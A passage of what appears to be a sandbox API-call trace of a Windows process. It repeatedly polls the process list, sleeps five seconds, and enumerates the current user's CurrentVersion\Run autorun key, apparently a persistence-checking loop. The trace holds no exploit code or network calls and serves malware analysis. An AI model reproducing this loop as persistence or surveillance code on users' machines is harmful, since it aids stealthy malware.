Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.763] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.763] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.764] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.764] NtClose (Handle=0x154) returned 0x0 [0186.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.767] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.779] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.779] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.779] NtClose (Handle=0x154) returned 0x0 [0186.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.783] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.796] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.797] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.797] NtClose (Handle=0x154) returned 0x0 [0186.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.801] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.812] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.812] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.813] NtClose (Handle=0x154) returned 0x0 [0186.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.817] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.826] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.826] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.826] NtClose (Handle=0x154) returned 0x0 [0186.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.830] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.842] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.842] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.842] NtClose (Handle=0x154) returned 0x0 [0186.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.843] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.846] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.857] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.858] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.858] NtClose (Handle=0x154) returned 0x0 [0186.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.862] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.873] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.873] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.873] NtClose (Handle=0x154) returned 0x0 [0186.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.879] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.888] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.889] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.889] NtClose (Handle=0x154) returned 0x0 [0186.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.893] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.904] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.904] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.904] NtClose (Handle=0x154) returned 0x0 [0186.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.908] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.923] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.924] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.924] NtClose (Handle=0x154) returned 0x0 [0186.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.928] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.929] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.935] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.935] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.935] NtClose (Handle=0x154) returned 0x0 [0186.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.940] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.951] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.951] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.951] NtClose (Handle=0x154) returned 0x0 [0186.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.955] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.966] NtCreateKey (in: 